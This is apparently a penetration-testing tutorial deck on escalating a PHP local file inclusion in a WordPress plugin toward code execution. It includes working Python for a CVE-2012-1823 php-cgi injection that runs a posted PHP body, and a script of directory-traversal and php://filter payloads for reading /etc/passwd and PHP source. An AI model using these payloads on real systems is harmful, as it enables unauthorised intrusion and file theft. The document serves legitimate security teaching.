Introduction to Penetration Testing

Introduction to Penetration Testing with a use case of LFI -> Shell. I talk about the mindset required to be a good tester, and show places many testers and automated tools stop and how to go further.


Introduction to Penetration Testing

Table of Contents
• Overview
• Enumeration
• Tool Output
• Do We Stop Here?
• Custom Scripts
• Wpscan
• Online Research
• Testing Exploitation
• PHP LFI
• Code Execution, Yes Please!

Overview
• This session will cover the mindset I follow when approaching a web application
• I am going to show where many might stop, and what happens when you push further
• These types of techniques can be applied to any web application

Overview Cont.
• Tools Leveraged:
– Nmap
– Whatweb
– Wpscan
– Wget
– Custom scripts
– Burp Suite
– Netcat
– Google

Methodology Overview
• Pre-Engagement Activities
– Hammer out all the details needed to conduct the test (schedule, scoping, rules of engagement, formal permission, etc.)
• Information Gathering and Reconnaissance
– Depends on the type of test and the information you are given (organization name, CIDR, list of URLs, source code, etc.)
• Automated Testing
• Manual Testing and Validation
• Reporting
• Remediation Support

Methodologies Cont.
• Penetration Testing Execution Standard (PTES):
– http://www.pentest-standard.org/index.php/Main_Page

Mindset is Key
• Think like an attacker and see things through a different lens:
– Upload an avatar? Hmmm, add code?
– Download a report? Hmm, directory traversal for another file?
• Confidence
– Without it you’ll very easily hit a wall and stop
– I tell myself a vulnerability is here; I just need to find it

Enumeration
• Nmap:
• WhatWeb:

Do We Stop Here?
• Hmmm?

Custom Scripts
• Web application testing requires custom scripting… there is really no way around it.

Custom Scripts Cont.
• Making web requests with a scripting language isn’t too difficult
• Check out tutorials online and try to automate web requests
• Making a tool for CVE-2012-1823 (the php-cgi query-string argument injection) is a good use case because you need to make a POST request and modify several header values
– If you can write a tool for this CVE, it demonstrates concepts that can be applied to many different CVEs
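The request the "Custom Scripts" slides describe, written out as an added example in Python. This is not the presenter's tool; it assumes the target runs PHP through php-cgi and that the web server passes a query string without an `=` to php-cgi as command-line arguments, which is the condition CVE-2012-1823 describes. `HOST`, `PORT`, `PATH` and the probe payload are placeholders; the point is the shape of the request (the encoded query string, and the Content-Type and Content-Length headers that php://input depends on), not any particular target.

```python
"""Custom-script example for CVE-2012-1823 (php-cgi argument injection).

Added example, not the presenter's own tool. Assumes the target runs PHP via
php-cgi and that a query string without '=' is passed to it as argv (the
CVE-2012-1823 condition). HOST, PORT and PATH are placeholders.
"""
import socket

HOST, PORT, PATH = "target.example", 80, "/index.php"   # placeholders

# php-cgi options smuggled in through the query string. Two headers matter on
# the way out: Content-Type so PHP treats the body as an ordinary POST, and
# Content-Length so php://input sees the whole payload.
CGI_OPTIONS = [
    ("-d", "allow_url_include=1"),            # permit stream wrappers in *_file directives
    ("-d", "auto_prepend_file=php://input"),  # run the POST body before the real script
]


def build_query_string(options=CGI_OPTIONS):
    """Encode php-cgi options as a CGI argv query string.

    Words are joined with '+', which the CGI server splits into separate argv
    entries. '=' must be sent percent-encoded: a query string containing a
    literal '=' is treated as form data rather than arguments, and the bug is
    never reached.
    """
    words = []
    for flag, value in options:
        words.append(flag)
        words.append(value.replace("=", "%3d"))
    return "+".join(words)


def build_request(host, path, php_code, query=None):
    """Return the raw HTTP/1.1 POST as bytes; php_code becomes the prepended file."""
    query = build_query_string() if query is None else query
    body = php_code.encode()
    head = (
        f"POST {path}?{query} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "User-Agent: Mozilla/5.0\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        f"Content-Length: {len(body)}\r\n"
        "Connection: close\r\n\r\n"
    )
    return head.encode() + body


def send_raw(host, port, request, timeout=10):
    """Send the raw request over a plain socket and return the full response bytes."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(request)
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


def split_response(raw):
    """Split an HTTP response into (status line, body bytes)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    return head.split(b"\r\n", 1)[0].decode(errors="replace"), body


# A harmless marker first: if it comes back in the body, the prepend worked and
# the same request shape will run whatever PHP you put in the body.
PROBE = "<?php echo 'CVE-2012-1823-PROBE'; ?>"

if __name__ == "__main__":
    req = build_request(HOST, PATH, PROBE)
    print(req.decode())
    # Against a live, in-scope target:
    # status, body = split_response(send_raw(HOST, PORT, req))
    # print(status, b"CVE-2012-1823-PROBE" in body)
```

Building the request by hand rather than through a high-level HTTP library is deliberate: the query string must reach the wire with `+` separators and a percent-encoded `=`, and a library that re-encodes the URL or strips the unusual query can quietly turn a working probe into a false negative.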
Wpscan
• Wpscan:

Wpscan
• Do we stop here?

Wpscan: Plugin Enumeration
• Wpscan: --enumerate p

Online Research

Online Research Cont.
• Hmm, our web server doesn’t respond when we request “/wordpress/wp/wp-content/”
• Do we stop here?

Testing Exploitation
• Yeah, let’s grab “/etc/passwd”

PHP LFI
• Cool, so we can LFI. Do we stop now?

PHP LFI… Now What?
• What can be done with a PHP LFI?
• It depends on which function leads to the LFI vulnerability (include(), readfile(), etc.)
• PHP functions like include() will execute PHP code in the included file
– Yay, code execution through PHP snippets!
• PHP functions like readfile() will only display the file’s contents
– We have more work to do
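The two steps above ("grab /etc/passwd", then "which function is behind the LFI?") as an added Python example; it is not the presenter's script. It assumes a `?page=` style parameter and a page named `login.php` in the webroot, both placeholders, and takes a `fetch(value)` function as input so the same logic can drive a real request or the constructed `FakeTarget` below. The include()-versus-readfile() test generalizes the slide's reasoning: asking for a PHP file directly shows raw source through a displaying sink but not through an executing one, and `php://filter` with base64 encoding returns the source either way, which rules out a plain 404.

```python
"""Probe a suspected PHP LFI parameter and tell an executing sink from a displaying one.

Added example, not the presenter's script. login.php, the parameter and the
webroot are assumptions; fetch() is injected so the logic runs offline
against the constructed FakeTarget.
"""
import base64
import posixpath
import re

PASSWD_RE = re.compile(r"root:[^:]*:0:0:")          # first line of /etc/passwd
B64_RUN_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")  # base64 blob inside an HTML page

# Ordered from most to least likely; the last two only matter when the
# application strips a single "../" or on PHP < 5.3.4 (null-byte truncation).
TRAVERSAL_PAYLOADS = [
    "../../../../etc/passwd",
    "../../../../../../../../etc/passwd",
    "/etc/passwd",
    "....//....//....//....//etc/passwd",
    "../../../../etc/passwd%00",
]


def find_lfi(fetch):
    """fetch(value) -> response body. Return the first payload that leaks /etc/passwd, else None."""
    for payload in TRAVERSAL_PAYLOADS:
        if PASSWD_RE.search(fetch(payload)):
            return payload
    return None


def classify_sink(fetch, script="login.php"):
    """'execute' for include()/require()-style sinks, 'display' for readfile()-style.

    A displaying sink echoes the raw source of a PHP file, so '<?php' shows up.
    An executing sink runs it and the tag never appears; php://filter then
    proves the file was reachable by handing back its base64-encoded source.
    """
    if "<?php" in fetch(script):
        return "display"
    wrapped = fetch(f"php://filter/convert.base64-encode/resource={script}")
    runs = B64_RUN_RE.findall(wrapped)
    if not runs:
        return "unknown"
    try:
        source = base64.b64decode(max(runs, key=len), validate=True).decode("utf-8", "replace")
    except ValueError:
        return "unknown"
    return "execute" if "<?php" in source else "unknown"


class FakeTarget:
    """Constructed stand-in for ?page= on a vulnerable site (no network needed)."""
    WEBROOT = "/var/www/html"
    FILES = {  # constructed sample files
        "/etc/passwd": "root:x:0:0:root:/root:/bin/bash\nwww-data:x:33:33::/var/www:/usr/sbin/nologin\n",
        "/var/www/html/login.php": "<?php echo 'Please log in'; ?>",
    }

    def __init__(self, sink):
        assert sink in ("execute", "display")
        self.sink = sink  # "execute" models include($_GET['page']); "display" models readfile()

    def _resolve(self, name):
        name = name.split("%00")[0]  # PHP < 5.3.4 truncated paths at a null byte
        path = name if name.startswith("/") else posixpath.join(self.WEBROOT, name)
        return posixpath.normpath(path)

    def fetch(self, value):
        prefix = "php://filter/convert.base64-encode/resource="
        if value.startswith(prefix):
            src = self.FILES.get(self._resolve(value[len(prefix):]), "")
            return "<html>" + base64.b64encode(src.encode()).decode() + "</html>"
        src = self.FILES.get(self._resolve(value))
        if src is None:
            return "<html>Warning: failed to open stream: No such file or directory</html>"
        if self.sink == "execute" and src.startswith("<?php"):
            return "<html>Please log in</html>"  # the include ran the code instead of showing it
        return "<html>" + src + "</html>"


if __name__ == "__main__":
    for sink in ("execute", "display"):
        t = FakeTarget(sink)
        print(sink, "->", find_lfi(t.fetch), classify_sink(t.fetch))
```

On a real engagement `fetch` is the one function you swap out (a `requests.get` with the value dropped into the vulnerable parameter, encoding left untouched). The `execute` result is what the next slide builds on: an include()-style sink will run any PHP it is pointed at, while a `display` result means the file read is real but you still need another route to execution.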
Code Execution? Yes, Please!
• Request:

Demo

Summary
• Tools may not give you the answer
• It is very easy to hit a hurdle and quit
• You need to be curious/creative and constantly push to get more information
• Confidence and mindset go a long way
